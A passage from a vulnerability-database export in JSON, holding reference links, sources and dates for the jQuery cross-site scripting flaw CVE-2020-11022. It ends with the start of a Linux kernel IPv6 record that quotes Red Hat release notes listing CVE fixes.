"title": "Tenable Security Advisories: [R1] LCE 6.0.9 Fixes Multiple Third-party Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-10"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231049 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 9",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231045 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231043 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231044 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231047 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204298 - Security Advisory"
},
{
"title": "Geolocation Playground",
"trust": 0.1,
"url": "https://github.com/blaufish/geo "
},
{
"title": "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022 "
},
{
"title": "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/korestreet/https-nj.gov---CVE-2020-11022 "
},
{
"title": "AlmostSignificant",
"trust": 0.1,
"url": "https://github.com/bartongroup/AlmostSignificant "
},
{
"title": "Bagel Patch Website\n\nTO DO:",
"trust": 0.1,
"url": "https://github.com/corey-schneider/bagel-shop "
},
{
"title": "JS_Encoder",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/JS_Encoder "
},
{
"title": "XSSPlayground\nWhat is XSS?",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/XSSPlayground "
},
{
"title": "jQuery XSS",
"trust": 0.1,
"url": "https://github.com/EmptyHeart5292/jQuery-XSS "
},
{
"title": "https://github.com/DanielRuf/snyk-js-jquery-565129",
"trust": 0.1,
"url": "https://github.com/DanielRuf/snyk-js-jquery-565129 "
},
{
"title": "CVE-2020-11022 CVE-2020-11023",
"trust": 0.1,
"url": "https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023 "
},
{
"title": "Strings_Attached\nUser Experience\nDevelopment Process\nTesting\nBugs\nLibraries and Programs Used\nDeployment\nCredits\nAcknowledgements",
"trust": 0.1,
"url": "https://github.com/johnrearden/strings_attached "
},
{
"title": "CVEcrystalyer",
"trust": 0.1,
"url": "https://github.com/captcha-n00b/CVEcrystalyer "
},
{
"title": "CVE Sandbox :: jQuery",
"trust": 0.1,
"url": "https://github.com/cve-sandbox/jquery "
},
{
"title": "jQuery \u2014 New Wave JavaScript",
"trust": 0.1,
"url": "https://github.com/spurreiter/jquery "
},
{
"title": "Github Repository Security Alerts",
"trust": 0.1,
"url": "https://github.com/elifesciences/github-repo-security-alerts "
},
{
"title": "Case Study",
"trust": 0.1,
"url": "https://github.com/faizhaffizudin/Case-Study-Hamsa "
},
{
"title": "Retire HTML Parser",
"trust": 0.1,
"url": "https://github.com/marksowell/retire-html-parser "
},
{
"title": "https://github.com/octane23/CASE-STUDY-1",
"trust": 0.1,
"url": "https://github.com/octane23/CASE-STUDY-1 "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/ArrestX/--POC "
},
{
"title": "Normal-POC",
"trust": 0.1,
"url": "https://github.com/Miraitowa70/POC-Notes "
},
{
"title": "Normal-POC",
"trust": 0.1,
"url": "https://github.com/Miraitowa70/Pentest-Notes "
},
{
"title": "Vulnerability",
"trust": 0.1,
"url": "https://github.com/tzwlhack/Vulnerability "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/KayCHENvip/vulnerability-poc "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/Threekiii/Awesome-POC "
},
{
"title": "\u6b22\u8fce\u5173\u6ce8\u963f\u5c14\u6cd5\u5b9e\u9a8c\u5ba4\u5fae\u4fe1\u516c\u4f17\u53f7",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/sec-daily-2020 "
},
{
"title": "SecBooks\nSecBooks\u76ee\u5f55",
"trust": 0.1,
"url": "https://github.com/SexyBeast233/SecBooks "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/soosmile/POC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 1.3,
"url": "https://www.debian.org/security/2020/dsa-4693"
},
{
"trust": 1.3,
"url": "https://security.gentoo.org/glsa/202007-03"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/security/advisories/ghsa-gxr4-xjj5-5px2"
},
{
"trust": 1.2,
"url": "https://security.netapp.com/advisory/ntap-20200511-0006/"
},
{
"trust": 1.2,
"url": "https://www.drupal.org/sa-core-2020-002"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2020-10"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2020-11"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-02"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-10"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/162159/jquery-1.2-cross-site-scripting.html"
},
{
"trust": 1.2,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77"
},
{
"trust": 1.2,
"url": "https://jquery.com/upgrade-guide/3.5/"
},
{
"trust": 1.2,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.2,
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3ccommits.airflow.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-055-02"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94912830/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu94847990/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99843134/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94973485/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-097-01"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-342-02"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07"
},
{
"trust": 0.8,
"url": "https://cert.vde.com/en/advisories/vde-2021-027/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:2217"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46175"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0091"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46363"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0264"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1274"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38749"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3ccommits.airflow.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/blaufish/geo"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1047"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-21843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-21835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1043"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1722"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20676"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1722"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20676"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4670"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20677"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202007-03\u003e"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5\u003e"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org/\u003e."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258."
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14333"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171215",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157850",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159275",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"date": "2020-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"date": "2020-11-04T15:29:15",
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"date": "2023-03-02T15:19:44",
"db": "PACKETSTORM",
"id": "171215",
"ident": null
},
{
"date": "2023-03-02T15:19:19",
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"date": "2020-11-04T15:32:52",
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"date": "2020-07-27T17:38:33",
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"date": "2020-05-28T16:07:33",
"db": "PACKETSTORM",
"id": "157850",
"ident": null
},
{
"date": "2020-09-24T00:30:36",
"db": "PACKETSTORM",
"id": "159275",
"ident": null
},
{
"date": "2020-05-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"date": "2020-04-29T22:15:11.903000",
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-07-25T00:00:00",
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"date": "2025-07-03T06:01:00",
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"date": "2024-11-21T04:56:36.110000",
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "jQuery\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code execution, xss, memory leak",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "159876"
}
],
"trust": 0.2
}
}
VAR-202112-2255
Vulnerability from variot - Updated: 2026-03-09 21:48In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. Linux Kernel Exists in the use of cryptographic algorithms.Information may be obtained. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.4.5 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/
Security fixes:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
nconf: Prototype pollution in memory store (CVE-2022-21803)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account (CVE-2022-24450)
-
Moment.js: Path traversal in moment.locale (CVE-2022-24785)
-
dset: Prototype Pollution in dset (CVE-2022-25645)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)
Bug fixes:
-
Trying to create a new cluster on vSphere and no feedback, stuck in "creating" (BZ# 1937078)
-
Wrong message is displayed when GRC fails to connect to an Ansible Tower (BZ# 2051752)
-
multicluster_operators_hub_subscription issues due to /tmp usage (BZ# 2052702)
-
Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field (BZ# 2054954)
-
Changing the multiclusterhub name other than the default name keeps the version in the web console loading (BZ# 2059822)
-
search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade (BZ# 2065318)
-
